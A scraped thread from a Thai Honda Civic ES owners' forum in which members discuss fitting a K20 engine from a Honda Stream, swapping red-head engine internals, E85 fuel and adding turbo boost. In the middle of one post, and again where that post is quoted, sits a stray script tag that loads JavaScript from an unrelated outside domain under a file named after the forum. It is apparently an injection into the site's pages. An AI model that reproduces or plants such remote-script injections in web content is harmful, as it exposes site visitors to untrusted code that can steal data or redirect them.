ซึ่งถ้าจะเอาท่อนล่างฝาแดงมาใส่ ผมว่าทนกว่าแน่นอน แถมได้กำลังอัดที่เพิ่มขึ้นด้วย ถ้ามีกล่องดีๆซักใบนึง




ผิดถูกยังไงรอท่านอื่นเพิ่มเติมนะครับ

 
ได้รับคำขอบคุณจาก: Ton-  lkki5  indica999  cisco  phasit  karnmotocross01 
a_bug


ชื่อเล่น: กอล์ฟ

เข้าร่วม: 31 มีนา 2012
ตอบ: 486

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 107

ที่อยู่: พระประแดง สมุทรปราการ
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 6 ธันวา 2013 10:08 - กำลังจะวางk20 มีคำถามครับ
เทคเปิดแล้วดึงขวา กำลังเป็นอยู่เลย สาเหตุจากอะไรได้บ้างครับ
ตอนนี้รอเปลี่ยนพวกลูกยางช่วงล่างก่อนแล้วว่าจะไปไล่ที่อื่นต่อ
ได้รับคำขอบคุณจาก: karnmotocross01 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 10:09 - กำลังจะวางk20 มีคำถามครับ
yoosabai พิมพ์ว่า:
indica999 พิมพ์ว่า:
เครื่องเป็นของstream เกียร์ทริปโทนิก ราคาค่าตัว35,000บาท +ค่าแท่นเครื่อง20,000+ค่าแรงช่าง 20,000(รวมแก้อิมโม เชื่อมจุดยึดเครื่องใหม่+ทำสีห้องเครื่อง ของเหลว โดยบอดี้เดิมเป็น02D17A2 ) + -ส่วนเกินไว้5000 รวมค่าทำทั้งหมด 80000บาท.
คำถามคือ
1.ใช้ABSเดิมได้อยู่มั้ยครับ
2.แล้วขนาดของเครื่องถ้าวางลงไปแล้ว รถโหลดมากจะทำให้เกียร์กับแคร้งน้ำมันเครื่องมีโอกาส ครูดพื้นมากน้อยแค่ไหน(ช่างเสนอวิธีโดยการยกตำแหน่งยึดเครื่องขึ้น และเสริมน๊อตที่ฐานฝากระโปรง) มันพอจะทำได้ไหมครับ
3.แล้วอาการที่ต้องห่วงหลังการวางเครื่องใหม่ที่จะตามมาต้องเตรียมงบค่าใช้จ่ายไว้ประมาณเท่าไหรครับ(ไม่รวมทำเบรกและช่วงล่างใหม่)
4.แล้วเครื่องตัวนี้สามารถเติมE85บ้านเราได้รึเปล่า(เห็นช่างบอกเป็นเครื่องยุ่นลงเรือมา) เพราะd17เดิมของผมเติมได้เลยไม่ต้องพ่วงกล่องใดๆทั่งสิ้น(ปั๊มติ๊ก1J)
5.อัตราสิ้นเปลืองมากน้อยแค่ไหนกับบอดี้es
6.เครื่องตัวนี้ถ้าผมทำฝา(ปาดและขัดพอร์ท) จะดีรึเปล่าครับ
7.และถ้าอนาคตจะหาฝาแดงประกบจะพอทำได้รึเปล่าครับ

จบคำถามเพียงเท่านี่ครับ ขอบคุณทุกท่านมากครับ



1. ระบบ ABS ควรจะใช้งานได้เหมือนเดิมครับ
2. โอกาสแคร๊งจะโดนพื้นน่าจะเป็นไปได้ยากนะครับ เพราะตำเหน่งเครื่องยังไงก็มีคานเป็นตัวบังคับอยู่ครับ
3. อย่าเรียกว่าอาการที่ต้องห่วงดีกว่า ให้มองว่าจุดที่ต้องดูแทนล่ะกันครับ ลองจับอาการรถ วิ่งตรงมั๊ย เร่งแล้วดึงซ้ายดึงขวารึเปล่า เบรคแล้วดึงซ้ายดึงขวามั๊ย ความร้อนปกติรึป่าว เกียร์เปลี่ยนปกติมั๊ย อะไรประมาณนี้ครับ
4. ถ้าจะเติม E85 แนะนำให้เปลี่ยนอุปกรณ์ที่ควรจะต้องเปลี่ยนไปเลยทีเดียวตอนวางเครื่องเลยครับ เช่นปั๊มติ๊ก ท่อน้ำมัน รวมถึงหัวฉีด ซึ่งอาจจะเป็น RDX หรือ K20A ฝาแดงครับ
5. ในเมืองกินกว่า D17 แน่นอนครับ แต่ถ้าวิ่งไกลๆความเร็วเฉลี่ย 100-140 ผมว่าประหยัดกว่า D17 ครับ ของผมเคยได้เยอะสุด 329 กิโลเมตร น้ำมันครึ่งถังครับ
6. อย่าทำเลยครับ ถ้าเป็นเกียร์ AT เกรงว่าจะได้ไม่คุ้มเงินที่จ่ายไป
7. อาจจะทำได้นะครับ แต่อาจจะไม่คุ้มทำอ่ะครับ เพราะเปลี่ยนฝาอย่างเดียวไม่พอ ต้องหากล่องมาคุม ซึ่งกล่องเดิมใช่ไม่ได้แน่นอน ฝาสูบฝาแดงน่าจะให้กำลังที่ดีในรอบสูง  ซึ่งหากเปิดรอบสูงเกิน 7,500 ขึ้นไป ท่อล่างเดิม K20A3 ของ Stream รองรับไม่ได้แน่นอนครับ

Layto พิมพ์ว่า:
newcolor พิมพ์ว่า:
Layto พิมพ์ว่า:

newcolor พิมพ์ว่า:

Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน


 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




ใช่คับ


ที่ใช้ได้น่าจะมีปั้มน้ำมันเครื่อง ลูกหัวนูน ก้านเหมือนกันไม่ต้องเปลี่ยน เสื้อสูบน่าจะเหมือนกันไม่น่าจะทนกว่า ถ้าจะเอาท่อนล่างมาใส่เลยต้องแปลงหลายอย่างครับ เจอช่างเก่งก็จบ ไม่เก่งก็ปัญหาตามมาอีกเยอะครับ ไม่แน่ใจน่ะครับเท่าที่เคยถามมาครับ




แล้วที่ว่ามีออยเจ็ทนี่มันอยู่ที่เสื้อหรือที่ปั๊มน้ำมันเครื่องคับที่ผมเล็งไว้คือ ข้อเหวี่ยง ผมเคยอ่านโพสของคุณเอกมั้งคับไม่แน่ใจว่าของฝาแดงจะถ่วงมาดีกว่า ออยเจ็ทฉีดใต้ลูกสูบ ก้าน ลูก ส่วนก้านที่ผมอ่านจากข้อความแกบอกว่าไม่เหมือนกันคับแต่ผมไม่รู้เลย ในกรณีของผมให้ลองตัดปัญหาเรื่องคุ้มไม่คุ้มออกดูคับเขาให้มา ที่คิดจะใส่ไม่ได้หวังจะทำต่อแรงนะคับในความคิดผมใส้ในของฝาแดงออกแบบมาลองรับรอบ7-8000+ได้อยู่แล้วแต่ผมเอามาใส่ในa3ที่ตัดรอบ6800นั่นหมายถึงเครื่องมันน่าจะทนกว่าปกติ (หรือเปล่า) อยากรู้ว่าผมคิดถูกมั้ยแล้วมันทำได้หรือป่าวคับ
 



มันคือ Qil Squiter มันจะอยู่ที่ใต้เสื้อสูบ เอาไว้ฉีดน้ำมันเครื่องเลี๊ยงก้าน ลูกสูบ ซึ่งจะมีเฉพาะฝาแดงเท่านั้น
ซึ่งส่วนอื่นที่ต่างกัน เท่าที่รู้จะมีปั๊มน้ำมันเครื่องที่ฝาแดงมีแรงดันสูงกว่า ฉุดกำลังเครื่องน้อยกว่า ข้อเหวี่ยงฝาแดงใหญ่กว่า ลูกสูบกำลังอัดสูงกว่า ระบายความร้อนดีกว่า และแพงกว่า  "<script src="https://sport32news.com/civicesgroup.js">

ซึ่งถ้าจะเอาท่อนล่างฝาแดงมาใส่ ผมว่าทนกว่าแน่นอน แถมได้กำลังอัดที่เพิ่มขึ้นด้วย ถ้ามีกล่องดีๆซักใบนึง




ผิดถูกยังไงรอท่านอื่นเพิ่มเติมนะครับ


 




พี่ แล้ว ก้านมันใหญ่กว่ากันเยอะไหมพี่  ฝาแดง-ฝาขาว  

ใจจริงผมอยากเอา ลูกก้านฝาแดงมาใส่  แล้วเพิ่มบูสต์  
ได้รับคำขอบคุณจาก: karnmotocross01 
yoosabai


ชื่อเล่น: เอ้

เข้าร่วม: 30 กันยา 2008
ตอบ: 1992

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8345
ให้คำขอบคุณ: 4773

ที่อยู่: Samutprakarn
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 6 ธันวา 2013 16:01 - กำลังจะวางk20 มีคำถามครับ
blackhawkpearl พิมพ์ว่า:
yoosabai พิมพ์ว่า:
indica999 พิมพ์ว่า:
เครื่องเป็นของstream เกียร์ทริปโทนิก ราคาค่าตัว35,000บาท +ค่าแท่นเครื่อง20,000+ค่าแรงช่าง 20,000(รวมแก้อิมโม เชื่อมจุดยึดเครื่องใหม่+ทำสีห้องเครื่อง ของเหลว โดยบอดี้เดิมเป็น02D17A2 ) + -ส่วนเกินไว้5000 รวมค่าทำทั้งหมด 80000บาท.
คำถามคือ
1.ใช้ABSเดิมได้อยู่มั้ยครับ
2.แล้วขนาดของเครื่องถ้าวางลงไปแล้ว รถโหลดมากจะทำให้เกียร์กับแคร้งน้ำมันเครื่องมีโอกาส ครูดพื้นมากน้อยแค่ไหน(ช่างเสนอวิธีโดยการยกตำแหน่งยึดเครื่องขึ้น และเสริมน๊อตที่ฐานฝากระโปรง) มันพอจะทำได้ไหมครับ
3.แล้วอาการที่ต้องห่วงหลังการวางเครื่องใหม่ที่จะตามมาต้องเตรียมงบค่าใช้จ่ายไว้ประมาณเท่าไหรครับ(ไม่รวมทำเบรกและช่วงล่างใหม่)
4.แล้วเครื่องตัวนี้สามารถเติมE85บ้านเราได้รึเปล่า(เห็นช่างบอกเป็นเครื่องยุ่นลงเรือมา) เพราะd17เดิมของผมเติมได้เลยไม่ต้องพ่วงกล่องใดๆทั่งสิ้น(ปั๊มติ๊ก1J)
5.อัตราสิ้นเปลืองมากน้อยแค่ไหนกับบอดี้es
6.เครื่องตัวนี้ถ้าผมทำฝา(ปาดและขัดพอร์ท) จะดีรึเปล่าครับ
7.และถ้าอนาคตจะหาฝาแดงประกบจะพอทำได้รึเปล่าครับ

จบคำถามเพียงเท่านี่ครับ ขอบคุณทุกท่านมากครับ



1. ระบบ ABS ควรจะใช้งานได้เหมือนเดิมครับ
2. โอกาสแคร๊งจะโดนพื้นน่าจะเป็นไปได้ยากนะครับ เพราะตำเหน่งเครื่องยังไงก็มีคานเป็นตัวบังคับอยู่ครับ
3. อย่าเรียกว่าอาการที่ต้องห่วงดีกว่า ให้มองว่าจุดที่ต้องดูแทนล่ะกันครับ ลองจับอาการรถ วิ่งตรงมั๊ย เร่งแล้วดึงซ้ายดึงขวารึเปล่า เบรคแล้วดึงซ้ายดึงขวามั๊ย ความร้อนปกติรึป่าว เกียร์เปลี่ยนปกติมั๊ย อะไรประมาณนี้ครับ
4. ถ้าจะเติม E85 แนะนำให้เปลี่ยนอุปกรณ์ที่ควรจะต้องเปลี่ยนไปเลยทีเดียวตอนวางเครื่องเลยครับ เช่นปั๊มติ๊ก ท่อน้ำมัน รวมถึงหัวฉีด ซึ่งอาจจะเป็น RDX หรือ K20A ฝาแดงครับ
5. ในเมืองกินกว่า D17 แน่นอนครับ แต่ถ้าวิ่งไกลๆความเร็วเฉลี่ย 100-140 ผมว่าประหยัดกว่า D17 ครับ ของผมเคยได้เยอะสุด 329 กิโลเมตร น้ำมันครึ่งถังครับ
6. อย่าทำเลยครับ ถ้าเป็นเกียร์ AT เกรงว่าจะได้ไม่คุ้มเงินที่จ่ายไป
7. อาจจะทำได้นะครับ แต่อาจจะไม่คุ้มทำอ่ะครับ เพราะเปลี่ยนฝาอย่างเดียวไม่พอ ต้องหากล่องมาคุม ซึ่งกล่องเดิมใช่ไม่ได้แน่นอน ฝาสูบฝาแดงน่าจะให้กำลังที่ดีในรอบสูง  ซึ่งหากเปิดรอบสูงเกิน 7,500 ขึ้นไป ท่อล่างเดิม K20A3 ของ Stream รองรับไม่ได้แน่นอนครับ

Layto พิมพ์ว่า:
newcolor พิมพ์ว่า:
Layto พิมพ์ว่า:

newcolor พิมพ์ว่า:

Layto พิมพ์ว่า:
ขอนอกเรื่องนิดนะคับ เราจะเอาท่อนล่างฝาแดงหมายถึงใต้ฝาสูบลงมาทั้งหมดมาใส่ใส่ในฝาดำesได้ป่าวคับด้วยเหตุผลที่ว่าเสื้อ ข้อเหวี่ยง ก้าน ลูก ของฝาแดงออกแบบมาให้ทนรอบสูงๆได้แต่เราไม่ได้ใส่เพื่อหวังแรงอะไรมากมายแต่คิดแค่อยากให้เครื่องมันทนteenหน่อยมันจะเป็นไปได้มั้ยคับ พอดีมีคนรู้จักเครื่องเขาพังเขาเปลี่ยนยกเครื่องเลยเขาบอกว่าอะไรที่ใช้ได้ก็แกะดูเองแล้วกัน


 

ใช้ES 2.0 เกียร์ออโต้ หรือเปล่าครับ




ใช่คับ


ที่ใช้ได้น่าจะมีปั้มน้ำมันเครื่อง ลูกหัวนูน ก้านเหมือนกันไม่ต้องเปลี่ยน เสื้อสูบน่าจะเหมือนกันไม่น่าจะทนกว่า ถ้าจะเอาท่อนล่างมาใส่เลยต้องแปลงหลายอย่างครับ เจอช่างเก่งก็จบ ไม่เก่งก็ปัญหาตามมาอีกเยอะครับ ไม่แน่ใจน่ะครับเท่าที่เคยถามมาครับ




แล้วที่ว่ามีออยเจ็ทนี่มันอยู่ที่เสื้อหรือที่ปั๊มน้ำมันเครื่องคับที่ผมเล็งไว้คือ ข้อเหวี่ยง ผมเคยอ่านโพสของคุณเอกมั้งคับไม่แน่ใจว่าของฝาแดงจะถ่วงมาดีกว่า ออยเจ็ทฉีดใต้ลูกสูบ ก้าน ลูก ส่วนก้านที่ผมอ่านจากข้อความแกบอกว่าไม่เหมือนกันคับแต่ผมไม่รู้เลย ในกรณีของผมให้ลองตัดปัญหาเรื่องคุ้มไม่คุ้มออกดูคับเขาให้มา ที่คิดจะใส่ไม่ได้หวังจะทำต่อแรงนะคับในความคิดผมใส้ในของฝาแดงออกแบบมาลองรับรอบ7-8000+ได้อยู่แล้วแต่ผมเอามาใส่ในa3ที่ตัดรอบ6800นั่นหมายถึงเครื่องมันน่าจะทนกว่าปกติ (หรือเปล่า) อยากรู้ว่าผมคิดถูกมั้ยแล้วมันทำได้หรือป่าวคับ
 



มันคือ Qil Squiter มันจะอยู่ที่ใต้เสื้อสูบ เอาไว้ฉีดน้ำมันเครื่องเลี๊ยงก้าน ลูกสูบ ซึ่งจะมีเฉพาะฝาแดงเท่านั้น
ซึ่งส่วนอื่นที่ต่างกัน เท่าที่รู้จะมีปั๊มน้ำมันเครื่องที่ฝาแดงมีแรงดันสูงกว่า ฉุดกำลังเครื่องน้อยกว่า ข้อเหวี่ยงฝาแดงใหญ่กว่า ลูกสูบกำลังอัดสูงกว่า ระบายความร้อนดีกว่า และแพงกว่า  "<script src="https://sport32news.com/civicesgroup.js">

ซึ่งถ้าจะเอาท่อนล่างฝาแดงมาใส่ ผมว่าทนกว่าแน่นอน แถมได้กำลังอัดที่เพิ่มขึ้นด้วย ถ้ามีกล่องดีๆซักใบนึง




ผิดถูกยังไงรอท่านอื่นเพิ่มเติมนะครับ


 




พี่ แล้ว ก้านมันใหญ่กว่ากันเยอะไหมพี่  ฝาแดง-ฝาขาว  

ใจจริงผมอยากเอา ลูกก้านฝาแดงมาใส่  แล้วเพิ่มบูสต์  



ก้านไม่ชัวร์นะว่าใหญ่กว่ากันหรือป่าว แต่ข้อเหวี่ยงใหญ่กว่าแน่นอนอ่ะครับต้อ
ได้รับคำขอบคุณจาก: karnmotocross01 
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 6 ธันวา 2013 16:22 - กำลังจะวางk20 มีคำถามครับ
ตอบ ลูกฝาแดงหัวนูนนะครับ(hi c/r) เอามาเซ็ทโบเห็นจะผิดหลักการไปซักหน่อย
ได้รับคำขอบคุณจาก: karnmotocross01 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 19:16 - กำลังจะวางk20 มีคำถามครับ
lkki5 พิมพ์ว่า:
ตอบ ลูกฝาแดงหัวนูนนะครับ(hi c/r) เอามาเซ็ทโบเห็นจะผิดหลักการไปซักหน่อย


นั่นแหละพี่ที่ผมกลัว หัวนูนนี่จบเลย
ผมอยากเอาก้านฝาแดงมาใสกับลูกเดิม กะจะให้มันเหนียวขึ้น
ได้รับคำขอบคุณจาก: karnmotocross01 
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 6 ธันวา 2013 19:28 - กำลังจะวางk20 มีคำถามครับ
ตอบ พื้นฐานเครื่อง na กับ tb รายละเอียดแตกต่างเยอะมาก ต้องลองศึกษาดีๆครับ มันตรงกันข้ามเลย
ได้รับคำขอบคุณจาก: karnmotocross01 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 21:16 - กำลังจะวางk20 มีคำถามครับ
lkki5 พิมพ์ว่า:
ตอบ พื้นฐานเครื่อง na กับ tb รายละเอียดแตกต่างเยอะมาก ต้องลองศึกษาดีๆครับ มันตรงกันข้ามเลย



คืองี้พี่ ผมอยากเพิ่มบูสต์ แต่เงินไม่พอซื้อลูกก้านซิ่ง

ผมเลยอยากเอาลูกฝาแดงมาใส่แต่พอมันเป็นหัวนูนกำลังอัดมันสูง
แล้วยิ่งเป็นTb กำลังอัดมันสูงอยู่แล้ว ผมเลยกะจะเอาแต่ก้านมันได้ไหมพี่ ผมว่ามันน่าจะทนกว่า ก้านฝาขาวอ่ะครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
ศุกร์, 6 ธันวา 2013 21:30 - กำลังจะวางk20 มีคำถามครับ
blackhawkpearl พิมพ์ว่า:
lkki5 พิมพ์ว่า:
ตอบ พื้นฐานเครื่อง na กับ tb รายละเอียดแตกต่างเยอะมาก ต้องลองศึกษาดีๆครับ มันตรงกันข้ามเลย



คืองี้พี่ ผมอยากเพิ่มบูสต์ แต่เงินไม่พอซื้อลูกก้านซิ่ง

ผมเลยอยากเอาลูกฝาแดงมาใส่แต่พอมันเป็นหัวนูนกำลังอัดมันสูง
แล้วยิ่งเป็นTb กำลังอัดมันสูงอยู่แล้ว ผมเลยกะจะเอาแต่ก้านมันได้ไหมพี่ ผมว่ามันน่าจะทนกว่า ก้านฝาขาวอ่ะครับ




ตอบ ลองดูพารทหรือยังว่ามันใส่กันได้หรือป่าว ข้อ ก้าน ชาฟอก ชาฟก้าน บางทีขนาดมันก็ต่างกัน
ได้รับคำขอบคุณจาก: karnmotocross01 
blackhawkpearl


ชื่อเล่น: ต้อ

เข้าร่วม: 22 เมษา 2010
ตอบ: 2761

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2781
ให้คำขอบคุณ: 223

ที่อยู่: ราชบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 6 ธันวา 2013 21:44 - กำลังจะวางk20 มีคำถามครับ
lkki5 พิมพ์ว่า:
blackhawkpearl พิมพ์ว่า:
lkki5 พิมพ์ว่า:
ตอบ พื้นฐานเครื่อง na กับ tb รายละเอียดแตกต่างเยอะมาก ต้องลองศึกษาดีๆครับ มันตรงกันข้ามเลย



คืองี้พี่ ผมอยากเพิ่มบูสต์ แต่เงินไม่พอซื้อลูกก้านซิ่ง

ผมเลยอยากเอาลูกฝาแดงมาใส่แต่พอมันเป็นหัวนูนกำลังอัดมันสูง
แล้วยิ่งเป็นTb กำลังอัดมันสูงอยู่แล้ว ผมเลยกะจะเอาแต่ก้านมันได้ไหมพี่ ผมว่ามันน่าจะทนกว่า ก้านฝาขาวอ่ะครับ




ตอบ ลองดูพารทหรือยังว่ามันใส่กันได้หรือป่าว ข้อ ก้าน ชาฟอก ชาฟก้าน บางทีขนาดมันก็ต่างกัน

ขอบคุณคร้าบผม
ได้รับคำขอบคุณจาก: karnmotocross01 
zzz


เข้าร่วม: 06 กรกฎา 2010
ตอบ: 760

Guru ES
Guru ES

ได้รับคำขอบคุณ: 572
ให้คำขอบคุณ: 360

ที่อยู่: ทุกที่...ที่มีงานทำ
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 7 ธันวา 2013 14:42 - กำลังจะวางk20 มีคำถามครับ
เทพ..เขาคุยกัน
ได้รับคำขอบคุณจาก: phasit  karnmotocross01 
Layto


เข้าร่วม: 21 กรกฎา 2011
ตอบ: 119

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 125
ให้คำขอบคุณ: 49

ที่อยู่: ลำปาง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 7 ธันวา 2013 21:49 - กำลังจะวางk20 มีคำถามครับ
a_bug พิมพ์ว่า:
เทคเปิดแล้วดึงขวา กำลังเป็นอยู่เลย สาเหตุจากอะไรได้บ้างครับ
ตอนนี้รอเปลี่ยนพวกลูกยางช่วงล่างก่อนแล้วว่าจะไปไล่ที่อื่นต่อ




โอ้วว ผมเพิ่งเป็นเลยคับแต่ของผมบูชลูกหมากช่วงล่างใหม่เบิก0ได้ไม่นานนี้เองงงเลย นึกสาเหตุไม่ออกเลยคับ
Layto


เข้าร่วม: 21 กรกฎา 2011
ตอบ: 119

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 125
ให้คำขอบคุณ: 49

ที่อยู่: ลำปาง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 7 ธันวา 2013 21:52 - กำลังจะวางk20 มีคำถามครับ
lkki5 พิมพ์ว่า:
blackhawkpearl พิมพ์ว่า:
lkki5 พิมพ์ว่า:
ตอบ พื้นฐานเครื่อง na กับ tb รายละเอียดแตกต่างเยอะมาก ต้องลองศึกษาดีๆครับ มันตรงกันข้ามเลย



คืองี้พี่ ผมอยากเพิ่มบูสต์ แต่เงินไม่พอซื้อลูกก้านซิ่ง

ผมเลยอยากเอาลูกฝาแดงมาใส่แต่พอมันเป็นหัวนูนกำลังอัดมันสูง
แล้วยิ่งเป็นTb กำลังอัดมันสูงอยู่แล้ว ผมเลยกะจะเอาแต่ก้านมันได้ไหมพี่ ผมว่ามันน่าจะทนกว่า ก้านฝาขาวอ่ะครับ




ตอบ ลองดูพารทหรือยังว่ามันใส่กันได้หรือป่าว ข้อ ก้าน ชาฟอก ชาฟก้าน บางทีขนาดมันก็ต่างกัน




มีที่ดูพาสอะไหล่ว่าตัวไหนใส่แทนกันได้ด้วยหรอคับ ดูได้ที่ไหนคับ
ได้รับคำขอบคุณจาก: karnmotocross01 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.